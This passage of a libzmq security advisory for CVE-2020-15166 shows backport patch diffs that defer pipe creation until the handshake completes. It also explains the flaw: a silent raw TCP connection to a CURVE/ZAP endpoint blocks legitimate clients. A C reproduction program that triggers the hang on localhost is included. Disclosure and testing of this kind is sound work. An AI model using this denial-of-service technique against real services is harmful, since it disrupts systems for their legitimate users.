     greeting_size (v2_greeting_size),
     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -296,9 +298,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -840,6 +845,9 @@ void zmq::stream_engine_t::mechanism_ready ()
         has_heartbeat_timer = true;
     }
 
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_identity) {
         msg_t identity;
         mechanism->peer_identity (&identity);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index b5163191..618d4cf0 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ namespace zmq
         };
 
         stream_engine_t (fd_t fd_, const options_t &options_,
-                         const std::string &endpoint);
+                         const std::string &endpoint,
+                         bool has_handshake_stage);
         ~stream_engine_t ();
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return _has_handshake_stage; };
         void plug (zmq::io_thread_t *io_thread_,
            zmq::session_base_t *session_);
         void terminate ();
@@ -176,6 +178,10 @@ namespace zmq
         //  The session this engine is attached to.
         zmq::session_base_t *session;
 
+        //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+        //  when handshake is completed.
+        bool _has_handshake_stage;
+
         options_t options;
 
         // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index eb365e5e..e81b8943 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -150,7 +150,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 0863916b..d27dfcd1 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -104,7 +104,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 92f35fec..052b14a5 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -123,7 +123,7 @@ void zmq::tipc_connecter_t::out_event ()
         return;
     }
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index 088346d7..90438892 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -91,7 +91,7 @@ void zmq::tipc_listener_t::in_event ()
     }
 
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/udp_engine.hpp b/src/udp_engine.hpp
index 94900626..042f15d7 100644
--- a/src/udp_engine.hpp
+++ b/src/udp_engine.hpp
@@ -23,6 +23,8 @@ namespace zmq
 
             int init (address_t *address_, bool send_, bool recv_);
 
+            bool has_handshake_stage () { return false; };
+
             //  i_engine interface implementation.
             //  Plug the engine to the session.
             void plug (zmq::io_thread_t *io_thread_, class session_base_t *session_);
4.1.4
diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 7a61e8e9..09eb0ec8 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -41,6 +41,10 @@ namespace zmq
     {
         virtual ~i_engine () {}
 
+        //  Indicate if the engine has an handshake stage.
+        //  If engine has handshake stage, engine must call session.engine_ready when the handshake is complete.
+        virtual bool has_handshake_stage () = 0;
+
         //  Plug the engine to the session.
         virtual void plug (zmq::io_thread_t *io_thread_,
             class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 34abb568..fbe53c6e 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -123,7 +123,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index 5c2a028f..9c973971 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -102,7 +102,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index 72542e19..04d3e3a7 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -26,6 +26,8 @@ namespace zmq
             // create NORM instance, session, etc
             int init(const char* network_, bool send, bool recv);
             void shutdown();
+
+            bool has_handshake_stage () { return false; };
             
             //  i_engine interface implementation.
             //  Plug the engine to the session.
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index 4594ab46..dadace5f 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -64,6 +64,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index bed05f75..c83e28ed 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -63,6 +63,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index 86bfd8ff..332f756c 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -256,7 +256,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -352,7 +353,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents [2] = {this, socket};
@@ -381,11 +393,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes [1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index 8730c271..ff4a899b 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -67,6 +67,7 @@ namespace zmq
         virtual void reset ();
         void flush ();
         void engine_error (zmq::stream_engine_t::error_reason_t reason);
+        void engine_ready ();
 
         //  i_pipe_events interface implementation.
         void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index a3b70436..a4c764c3 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -152,7 +152,7 @@ void zmq::socks_connecter_t::in_event ()
 
                 //  Create the engine object for this connection.
                 stream_engine_t *engine = new (std::nothrow)
-                    stream_engine_t (s, options, endpoint);
+                    stream_engine_t (s, options, endpoint, !options.raw_sock);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index faca8929..507421e9 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -72,7 +72,8 @@
 #include "wire.hpp"
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     inpos (NULL),
     insize (0),
@@ -85,6 +86,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
     greeting_size (v2_greeting_size),
     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -272,9 +274,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -791,6 +796,9 @@ void zmq::stream_engine_t::zap_msg_available ()
 
 void zmq::stream_engine_t::mechanism_ready ()
 {
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_identity) {
         msg_t identity;
         mechanism->peer_identity (&identity);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index d42c6929..ea8f809a 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ namespace zmq
         };
 
         stream_engine_t (fd_t fd_, const options_t &options_,
-                         const std::string &endpoint);
+                         const std::string &endpoint,
+                         bool has_handshake_stage_);
         ~stream_engine_t ();
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return _has_handshake_stage; };
         void plug (zmq::io_thread_t *io_thread_,
            zmq::session_base_t *session_);
         void terminate ();
@@ -172,6 +174,10 @@ namespace zmq
         //  The session this engine is attached to.
         zmq::session_base_t *session;
 
+        //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+        //  when handshake is completed.
+        bool _has_handshake_stage;
+
         options_t options;
 
         // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index fdbc45c2..311d0d8a 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -139,7 +139,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 05171b35..83321d6e 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -106,7 +106,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 11b53c50..4c6f7b17 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -121,7 +121,7 @@ void zmq::tipc_connecter_t::out_event ()
         return;
     }
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index fb8df6c3..7003630d 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -89,7 +89,7 @@ void zmq::tipc_listener_t::in_event ()
     }
 
     //  Create the engine object for this connection.
-    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint);
+    stream_engine_t *engine = new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
4.0.5
diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 39266c41..cd22ea48 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -31,6 +31,10 @@ namespace zmq
     {
         virtual ~i_engine () {}
 
+        //  Indicate if the engine has an handshake stage.
+        //  If engine has handshake stage, engine must call session.engine_ready when the handshake is complete.
+        virtual bool has_handshake_stage () = 0;
+
         //  Plug the engine to the session.
         virtual void plug (zmq::io_thread_t *io_thread_,
             class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 239d2be9..64cf571d 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -113,7 +113,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index b102da6d..f7f1542a 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -81,7 +81,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index 1f5d2d4e..5eabf7f2 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -54,6 +54,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index 045cd474..00d8ffbe 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -53,6 +53,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index 537dcb3e..4f877768 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -238,7 +238,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -326,7 +327,18 @@ int zmq::session_base_t::zap_connect ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
+
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
 
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents [2] = {this, socket};
@@ -355,11 +367,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes [1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::detach ()
diff --git a/src/session_base.hpp b/src/session_base.hpp
index 2ef7dc50..94cadc89 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -56,6 +56,7 @@ namespace zmq
         virtual void reset ();
         void flush ();
         void detach ();
+        void engine_ready ();
 
         //  i_pipe_events interface implementation.
         void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index 4d252d89..e883af98 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -53,7 +53,8 @@
 #include "wire.hpp"
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_, 
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     inpos (NULL),
     insize (0),
@@ -65,6 +66,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
     greeting_size (v2_greeting_size),
     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -191,9 +193,12 @@ void zmq::stream_engine_t::in_event ()
     assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -651,6 +656,9 @@ void zmq::stream_engine_t::zap_msg_available ()
 
 void zmq::stream_engine_t::mechanism_ready ()
 {
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_identity) {
         msg_t identity;
         mechanism->peer_identity (&identity);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index 631d1cbb..4465e57c 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -53,10 +53,12 @@ namespace zmq
     public:
 
         stream_engine_t (fd_t fd_, const options_t &options_, 
-                         const std::string &endpoint);
+                         const std::string &endpoint,
+                         bool has_handshake_stage_);
         ~stream_engine_t ();
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return _has_handshake_stage; };
         void plug (zmq::io_thread_t *io_thread_,
            zmq::session_base_t *session_);
         void terminate ();
@@ -156,6 +158,10 @@ namespace zmq
         //  The session this engine is attached to.
         zmq::session_base_t *session;
 
+        //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+        //  when handshake is completed.
+        bool _has_handshake_stage;
+
         options_t options;
 
         // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index 9e87a71d..69c95109 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -126,7 +126,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 89e146b6..6ab40ed2 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -92,7 +92,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_sock);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/tests/testutil.hpp b/tests/testutil.hpp
index 7a42379d..e8744aee 100644
--- a/tests/testutil.hpp
+++ b/tests/testutil.hpp
@@ -140,8 +140,12 @@ expect_bounce_fail (void *server, void *client)
 
     //  Send message from server to client to test other direction
     rc = zmq_send (server, content, 32, ZMQ_SNDMORE);
+    if (rc == -1 && zmq_errno () == EAGAIN)
+        return;
     assert (rc == 32);
     rc = zmq_send (server, content, 32, 0);
+    if (rc == -1 && zmq_errno () == EAGAIN)
+        return;
     assert (rc == 32);
 
     //  Receive message at client side (should not succeed)

Workarounds

No workarounds known

References

Found thanks to Google's oss-fuzz project:
https://oss-fuzz.com/testcase-detail/5707174518194176

For more information

If a raw TCP socket is opened and connected to an endpoint that is fully configured with CURVE/ZAP, legitimate clients will not be able to exchange any message. Handshakes complete successfully, and messages are delivered to the library, but the server application never receives them.

To reproduce, simply run the following test program; if the library is affected, it will deadlock and never terminate:

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <assert.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <zmq.h>

/*
 * Minimal ZAP handler that approves every authentication request.
 *
 * Runs as a thread entry point: `ctx` is the ZeroMQ context on which the REP
 * socket bound to "inproc://zeromq.zap.01" is created. For each request the
 * seven request frames are read (only the sequence frame is kept) and a
 * "200 OK" reply for user "anonymous" is sent back, echoing the sequence
 * frame. The loop ends as soon as receiving the first frame of a request
 * fails, after which the socket is unbound and closed.
 */
static void zap_handler(void *ctx)
{
    int rc;

    void *handler = zmq_socket(ctx, ZMQ_REP);
    assert(handler);
    rc = zmq_bind(handler, "inproc://zeromq.zap.01");
    assert(rc == 0);

    while (true) {
        /* Both buffers are as large as the length handed to zmq_recv, so a
         * frame can never be written past the end of the array. */
        char buf[256], sequence[256];
        size_t sequence_len;

        // version
        rc = zmq_recv(handler, buf, sizeof(buf), 0);
        if (rc < 0)
            break;
        // sequence
        rc = zmq_recv(handler, sequence, sizeof(sequence), 0);
        assert (rc > 0);
        /* zmq_recv reports the full frame size even when the frame was
         * truncated to fit, so clamp to what is actually stored. */
        sequence_len = (size_t) rc < sizeof(sequence) ? (size_t) rc
                                                      : sizeof(sequence);
        // domain
        rc = zmq_recv(handler, buf, sizeof(buf), 0);
        assert (rc > 0);
        // address
        rc = zmq_recv(handler, buf, sizeof(buf), 0);
        assert (rc > 0);
        // routing_id (may be empty)
        rc = zmq_recv(handler, buf, sizeof(buf), 0);
        assert (rc >= 0);
        // mechanism
        rc = zmq_recv(handler, buf, sizeof(buf), 0);
        assert (rc > 0);
        // key
        rc = zmq_recv(handler, buf, sizeof(buf), 0);
        assert (rc > 0);

        // reply: version
        rc = zmq_send(handler, "1.0", 3, ZMQ_SNDMORE);
        assert(rc == 3);
        // reply: sequence, echoed by length so embedded NUL bytes survive
        rc = zmq_send(handler, sequence, sequence_len, ZMQ_SNDMORE);
        assert(rc == (int) sequence_len);
        // reply: status code
        rc = zmq_send(handler, "200", 3, ZMQ_SNDMORE);
        assert(rc == 3);
        // reply: status text
        rc = zmq_send(handler, "OK", 2, ZMQ_SNDMORE);
        assert(rc == 2);
        // reply: user id
        rc = zmq_send(handler, "anonymous", 9, ZMQ_SNDMORE);
        assert(rc == 9);
        // reply: empty final frame
        rc = zmq_send(handler, "", 0, 0);
        assert(rc == 0);
    }

    zmq_unbind(handler, "inproc://zeromq.zap.01");
    zmq_close(handler);
}

/*
 * Reproduction driver.
 *
 * Binds a CURVE server DEALER socket with a ZAP domain on
 * tcp://127.0.0.1:54321, connects a plain (non-ZMTP) TCP socket to it that
 * never sends anything, then connects a properly keyed CURVE DEALER client
 * and bounces a two-part message in both directions. Per the advisory text,
 * an affected library never delivers the client's message to the server, so
 * the first blocking zmq_recv on `server` does not return.
 *
 * Returns 0 when the full exchange succeeds; every failed step aborts via
 * assert.
 */
int main (int argc, char **argv)
{
    /* Key strings; the length 41 passed to zmq_setsockopt below is
     * presumably the 40-character text plus its NUL terminator. */
    const char *client_public = "{{k*81)yMWEF{/BxdMd[5RL^qRFxBgoL<8m.D^KD";
    const char *client_secret = "N?Gmik8R[2ACw{b7*[-$S6[4}aO#?DB?#=<OQPc7";
    const char *server_public = "3.9-xXwy{g*w72TP*3iB9IJJRxlBH<ufTAvPd2>C";
    const char *server_secret = "T}t5GLq%&Qm1)y3ywu-}pY3KEA//{^Ut!M1ut+B4";
    char buf[256];
    int rc;

    /* Command-line arguments are not used. */
    (void) argc;
    (void) argv;

    void *ctx = zmq_ctx_new();
    assert(ctx);

    /* Run the accept-all ZAP handler on its own thread. */
    void *zap_thread = zmq_threadstart (zap_handler, ctx);
    assert(zap_thread);

    /* CURVE server endpoint with a ZAP domain configured. */
    void *server = zmq_socket(ctx, ZMQ_DEALER);
    assert(server);
    int as_server = 1;
    rc = zmq_setsockopt (server, ZMQ_CURVE_SERVER, &as_server, sizeof (int));
    assert (rc == 0);
    rc = zmq_setsockopt (server, ZMQ_CURVE_SECRETKEY, server_secret, 41);
    assert (rc == 0);
    rc = zmq_setsockopt (server, ZMQ_ZAP_DOMAIN, "ZAP", 3);
    assert (rc == 0);
    rc = zmq_bind(server, "tcp://127.0.0.1:54321");
    assert (rc == 0);

    /* Unauthenticated peer: a raw TCP connection that stays silent.
     * The address structure is zeroed first so no indeterminate padding is
     * handed to connect(). */
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(54321);
    rc = inet_aton("127.0.0.1", &addr.sin_addr);
    assert (rc != 0);
    int client_bad = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    /* socket() reports failure with -1; descriptor 0 is a valid result. */
    assert(client_bad >= 0);
    rc = connect(client_bad, (struct sockaddr *)&addr, sizeof(addr));
    assert (rc == 0);

    /* Legitimate CURVE client. */
    void *client_good = zmq_socket(ctx, ZMQ_DEALER);
    assert(client_good);
    rc = zmq_setsockopt (client_good, ZMQ_CURVE_SERVERKEY, server_public, 41);
    assert (rc == 0);
    rc = zmq_setsockopt (client_good, ZMQ_CURVE_PUBLICKEY, client_public, 41);
    assert (rc == 0);
    rc = zmq_setsockopt (client_good, ZMQ_CURVE_SECRETKEY, client_secret, 41);
    assert (rc == 0);
    rc = zmq_connect(client_good, "tcp://127.0.0.1:54321");
    assert (rc == 0);

    /* Client -> server: two-part message "ABC" / "DEF". */
    rc = zmq_send(client_good, "ABC", 3, ZMQ_SNDMORE);
    assert (rc == 3);
    rc = zmq_send(client_good, "DEF", 3, 0);
    assert (rc == 3);
    /* Blocking receive: this is the call that hangs when the message is
     * never delivered to the server socket. */
    rc = zmq_recv(server, buf, sizeof(buf), 0);
    assert (rc == 3);
    rc = memcmp(buf, "ABC", 3);
    assert (rc == 0);
    rc = zmq_recv(server, buf, sizeof(buf), ZMQ_DONTWAIT);
    assert (rc == 3);
    rc = memcmp(buf, "DEF", 3);
    assert (rc == 0);

    /* Server -> client: same two-part message in the other direction. */
    rc = zmq_send(server, "ABC", 3, ZMQ_SNDMORE);
    assert (rc == 3);
    rc = zmq_send(server, "DEF", 3, 0);
    assert (rc == 3);
    rc = zmq_recv(client_good, buf, sizeof(buf), 0);
    assert (rc == 3);
    rc = memcmp(buf, "ABC", 3);
    assert (rc == 0);
    rc = zmq_recv(client_good, buf, sizeof(buf), ZMQ_DONTWAIT);
    assert (rc == 3);
    rc = memcmp(buf, "DEF", 3);
    assert (rc == 0);

    close(client_bad);
    zmq_close(client_good);
    zmq_close(server);
    zmq_ctx_term(ctx);
    /* Join and release the handler thread; its loop is expected to exit once
     * its pending receive fails during context termination. */
    zmq_threadclose(zap_thread);

    return 0;
}

Severity

High

CVE ID

CVE-2020-15166

Weaknesses

No CWEs